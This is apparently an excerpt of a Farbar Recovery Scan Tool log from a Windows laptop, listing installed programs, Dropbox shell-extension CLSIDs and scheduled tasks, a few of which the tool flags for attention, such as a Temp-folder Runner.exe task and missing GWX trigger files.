AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.2.8870 - Adobe Systems Inc.)
Adobe Flash Player 19 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 19.0.0.185 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader X (10.1.15) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.15 - Adobe Systems Incorporated)
AirStream-Suite (HKLM-x32\...\{734D87EE-15DC-49C9-943E-605E9B55A5D8}) (Version: 5.4.4 - )
Avast Free Antivirus (HKLM-x32\...\avast) (Version: 11.1.2253 - AVAST Software)
Bluesoleil 5.4.277.0 (HKLM\...\{FBBAB883-0BEE-4744-8062-281B213ADC1E}) (Version: 5.4.277.0 - IVT Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 5.14 - Piriform)
Chromium (HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Chromium) (Version: 50.0.2632.0 - Chromium)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
DameWare Development Mirror Driver 64 Uninstall (HKLM\...\DamewareMirror) (Version: - )
Dropbox (HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Dropbox) (Version: 3.18.1 - Dropbox, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 50.0.2661.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HDMI Control Manager (HKLM-x32\...\InstallShield_{63DA1F6A-2E65-4367-99B9-9E39FADEC446}) (Version: 2.0 - TOSHIBA CORPORATION)
HDMI Control Manager (Version: 2.0 - TOSHIBA CORPORATION) Hidden
HDMI Control Manager (x32 Version: 2.0 - TOSHIBA CORPORATION) Hidden
iCare Data Recovery (HKLM-x32\...\{43D63B27-661F-428E-97B7-70D0604D28E8}_is1) (Version: 7.8.2 - iCare Recovery)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.0.1006 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.5.0.1037 - Intel Corporation)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.34.2 - JMicron Technology Corp.)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 365 Small Business Premium - en-us (HKLM\...\O365SmallBusPremRetail - en-us) (Version: 15.0.4815.1001 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{C5C1C0F0-D62F-4DBF-81D4-D7EF397C228B}) (Version: 9.09.0814 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Opera Stable 36.0.2130.65 (HKLM-x32\...\Opera 36.0.2130.65) (Version: 36.0.2130.65 - Opera Software)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Readon TV Movie Radio Player 7.6.0.0 (HKLM-x32\...\{80074966-5231-428D-9AE7-B7D5D2DC3246}) (Version: 7.6.0 - Readon Technology)
Realtek Ethernet Controller Driver For Windows Vista and Later (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5928 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{0FB630AB-7BD8-40AE-B223-60397D57C3C9}) (Version: 2.00.0006 - Realtek)
Remote Mouse version 2.702 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.702 - Remote Mouse)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16035.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16035.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.59.0 - Samsung Electronics Co., Ltd.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Southpark Stick of Truth (HKLM-x32\...\U291dGhwYXJrU3RpY2tvZlRydXRo_is1) (Version: 1 - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.10.0 - Synaptics Incorporated)
System Requirements Lab Detection (HKLM-x32\...\{A407FC22-36BF-4C82-A516-59D94BC505A9}) (Version: 1.0.5.0 - Husdawg, LLC)
TOSHIBA ConfigFree (HKLM-x32\...\{F3529665-D75E-4D6D-98F0-745C78C68E9B}) (Version: 8.0.25 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.01.1.07-A - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.3.64 - TOSHIBA Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.4C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.0.16C - TOSHIBA CORPORATION)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.0.3 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.4 - TOSHIBA Corporation)
Toshiba Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version: 10.00 - TOSHIBA)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.5.6.64 - TOSHIBA Corporation)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 x64 - TOSHIBA Corporation)
TOSHIBA Recovery Media Creator Reminder (HKLM-x32\...\InstallShield_{773970F1-5EBA-4474-ADEE-1EA3B0A59492}) (Version: 1.00.0019 - TOSHIBA)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.3.2.0 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.9 - TOSHIBA Corporation)
TRORMCLauncher (HKLM-x32\...\InstallShield_{E65C7D8E-186D-484B-BEA8-DEF0331CE600}) (Version: - )
TRORMCLauncher (Version: 1.0.0.9 - TOSHIBA) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Utility Common Driver (x32 Version: 1.0.50.27C - TOSHIBA) Hidden
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Visual C++ 2008 x86 Runtime - v9.0.30729.01 (HKLM-x32\...\{F333A33D-125C-32A2-8DCE-5C5D14231E27}.vc_x86runtime_30729_01) (Version: 9.0.30729.01 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.3.0.0 - Azureus Software, Inc.)
Windows 7 Upgrade Advisor (HKLM-x32\...\{AB05F2C8-F608-403b-95E1-FD8ADFACD31E}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
Wolfenstein (x32 Version: 1.0 - Activision) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00D9829D-3BB1-4081-A7D4-B810499EC541} - System32\Tasks\Opera scheduled Autoupdate 1423088991 => C:\Program Files (x86)\Opera\launcher.exe [2016-04-11] (Opera Software)
Task: {08981218-72F4-49C9-97AA-3F5E37CAEB9B} - System32\Tasks\{09B27912-9A43-4FF7-BD30-57630748A883} => C:\Users\Administrator\Desktop\Killer_Instinct_Gold.exe
Task: {0BF7B5EA-2A57-478E-ADBD-F7F2335C49DF} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {15B3C99C-441D-4307-9EED-81FF4235CABA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {186D32FA-F97C-47FB-97F6-736F8F776B36} - System32\Tasks\{D1BBCD9B-168D-4276-A916-0F5F8245D950} => pcalua.exe -a C:\ProgramData\DivX\Setup\DivXSetup.exe -c /uninstall /bundleGroupId divx.com
Task: {21431663-23D7-40F6-A415-22673F2E0617} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {21A6F611-E4CA-4E1E-9832-7133DC62CF89} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {24D2CEAB-ED2E-4B9F-AAE2-8AECBD6D9F1F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {260CCA0A-B0E4-4D79-88A1-F14E7F519FAC} - System32\Tasks\CCleanerSkipUAC => C:\Program Files (x86)\CCleaner\CCleaner.exe [2016-01-15] (Piriform Ltd)
Task: {28E669F9-44D9-4BB3-ACB1-5C8042FEFEA7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500UA => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-19] (Dropbox, Inc.)
Task: {31A0B560-2F6A-4A78-90F7-8F9EC6C51153} - System32\Tasks\{5F88DBBA-CDE8-4AE1-85F9-20A0392DFCA9} => C:\Program Files (x86)\Skype\Phone\Skype.exe [2014-12-11] (Skype Technologies S.A.)
Task: {3338E8A2-41E8-48F3-B771-DF917BA886FF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {3A980C6B-EA6A-4300-A9F1-FB6DFB1FD276} - System32\Tasks\{794D2B9A-6983-4A27-B006-03C4BF798CCF} => pcalua.exe -a J:\setup.exe -d J:\
Task: {3D7B0ACF-A7CA-4DBC-AF76-23CCD96420CD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe [2010-06-26] (Google Inc.)
Task: {3E723A07-ADAE-49AD-ACE4-ECCE877BFD74} - System32\Tasks\{33D6D88F-312B-4AF6-B7C2-11F80ACE0423} => Chrome.exe
Task: {4B3F8A78-73D8-41DA-9C9A-CA3F1BD70233} - System32\Tasks\{ED6CA3B1-DD85-4B52-8D35-7A4E561D8EE4} => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2009-11-21] (TOSHIBA CORPORATION.)
Task: {4B695E67-D0FD-420F-ACC4-45DD4D3DBA53} - System32\Tasks\{5527599E-4D2B-4E27-BC45-DD9ECF58BB16} => C:\Users\Administrator\Desktop\Killer_Instinct_Gold.exe
Task: {4C3294AF-E1B0-4DB5-AECD-86FFD9C02BD9} - System32\Tasks\{658EBFDD-0FA9-428F-AB19-0C8C1A749E40} => pcalua.exe -a C:\Users\Administrator\Desktop\verypdf-free-txt2pdf.exe -d C:\Users\Administrator\Desktop
Task: {4C4E2760-7F69-424E-B358-1555749C68A2} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_19_0_0_185_pepper.exe [2015-09-21] (Adobe Systems Incorporated)
Task: {56BEF496-DE23-4FC9-B86F-9168B79EA5DD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {57C20DD6-8BB6-46DF-87CE-1095EEB1DC7B} - System32\Tasks\{6FAE5151-0CA3-4E2E-A01B-A5D9FCCAA8A6} => Chrome.exe
Task: {5CA4C754-7EC0-4126-97AE-4BDED30FF830} - System32\Tasks\{5BACAC0C-665F-48C9-8C6D-BC6C6F14CBEE} => pcalua.exe -a "M:\Adobe Photoshop CS4 Extended Edition\Photoshop CS4 Install\payloads\AdobeAIR1.0\AdobeAIRInstaller.exe" -d "C:\Program Files (x86)\Common Files\Adobe\Installers\faf656ef605427ee2f42989c3ad31b8" -c -silent
Task: {5CB7EB51-105F-4371-A605-40287949AB36} - System32\Tasks\avast! Emergency Update => C:\Program Files\Alwil Software\Avast5\AvastEmUpdate.exe [2016-02-19] (AVAST Software)
Task: {5DEA4054-A452-40D0-AAFE-7C072CCCC819} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-14] (Microsoft Corporation)
Task: {69AC9BBD-9EB4-4F3B-8F18-9E52ECE2BF73} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {712FAA8C-672B-45F6-9333-FAA80D7848A3} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500Core => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-19] (Dropbox, Inc.)
Task: {75C1AC0E-E49E-4B1C-84A0-FAF974825FDC} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {7648CD77-5E65-4D93-85AA-8ED7CDF43B69} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {7C2C3EC5-C44D-4D7D-BAD7-F1F110691DA2} - System32\Tasks\{93E542A6-D284-4FC7-8F38-4BD1224DB099} => Chrome.exe
Task: {883A4C4B-246A-4802-A430-C2F758594DE3} - System32\Tasks\{E76114B5-F5E0-4110-A9D4-4E4D1B9AC0E6} => Chrome.exe
Task: {8AE63F37-E3BB-487B-A3E9-89E4E1F3D437} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {8B7CBE50-1EFE-4DCC-A26C-A6526401CE28} - System32\Tasks\Test TimeTrigger => C:\Users\ADMINI~1\AppData\Local\Temp\Runner.exe <==== ATTENTION
Task: {8DA0916B-D6EF-41AC-848E-4E56BFEDC356} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {8E769F28-6811-46DC-8860-7F357DE0E54B} - System32\Tasks\{165E0EEE-053E-430B-BE7E-3A4C136D1416} => pcalua.exe -a "H:\Adobe Photoshop CS4 Extended Edition\Photoshop CS4 Install\payloads\AdobeAIR1.0\AdobeAIRInstaller.exe" -d "C:\Program Files (x86)\Common Files\Adobe\Installers\faf656ef605427ee2f42989c3ad31b8" -c -silent
Task: {90110391-5111-4908-8357-59AB34EAC899} - System32\Tasks\{A7FE5530-718F-4B1D-91C1-3A81F217DBAB} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{F9B37992-968C-4264-8449-489032FC28DE}\setup.exe" -c -runfromtemp -l0x0409
Task: {93BF64C1-401B-43B9-8B4A-83AD13FEEBD3} - System32\Tasks\{4E6158EF-F90B-4F5C-9F7C-10BC4CC4F602} => pcalua.exe -a C:\Users\pcw\Downloads\DAEMONToolsPro4360309-0160.exe -d C:\Users\pcw\Downloads
Task: {A0E8684E-1879-4B47-8795-9AD16D3C0DAA} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {A87ADFE8-F13C-4D45-B037-ED71675B81EE} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2016-03-15] (Microsoft Corporation)
Task: {ACD93D0B-9F74-4ECB-AA1D-465B68C2B374} - System32\Tasks\{C51C5F60-15B8-44A6-80FE-F94C1A28E364} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.1.0.104.280/en/abandoninstall?page=tsMain&installinfo=google-toolbar:notoffered;notincluded,google-chrome&#058;notoffered;disabled
Task: {B0911F13-D386-4D8E-B46D-0E0E4FD1309B} - System32\Tasks\{DA8CF6A7-882A-4087-B739-D8ADAF57AD4C} => pcalua.exe -a E:\QuickInstall.exe -d E:\
Task: {B4C93BE6-062B-42EE-873F-2F36B8B7CA53} - System32\Tasks\{3B443DDB-226F-406A-8161-AAE960162048} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lig ... tError=404
Task: {B80AEAC9-2D84-4293-8EA5-73407A8471BB} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B8BF88B3-398C-4304-AA50-6C6D8ECFD01B} - System32\Tasks\{6FE33958-2979-4FC5-ABBC-7DCE16700255} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\Office Setup Controller\setup.exe" -c /uninstall HOMESTUDENTR /dll OSETUP.DLL
Task: {BBC78C39-A315-448C-B166-44C453FFC47D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe [2010-06-26] (Google Inc.)
Task: {C0457296-52EC-4EE4-8AD5-DB20CAF0F0FF} - System32\Tasks\{27B2263C-7E6F-441A-9C1B-2954741052B7} => pcalua.exe -a "C:\Users\Administrator\Documents\Vuze Downloads\STALKER Call Of Pripyat-Razor1911\rzr-stcp\Redist\NetFX\dotnetfx35.exe" -d "C:\Users\Administrator\Documents\Vuze Downloads\STALKER Call Of Pripyat-Razor1911\rzr-stcp\Redist\NetFX"
Task: {C06087C5-D73B-4ECB-9E1D-E5267F81C592} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {D62329D7-4821-4EA9-882E-0D72058F7A1F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {EC632829-4F17-4438-996D-DB96D27DF7D2} - System32\Tasks\{777698A2-10AB-4C3D-9052-E5A7866A67DD} => pcalua.exe -a E:\QuickInstall.exe -d E:\
Task: {ED898442-2CFF-46BD-907B-F32299346882} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
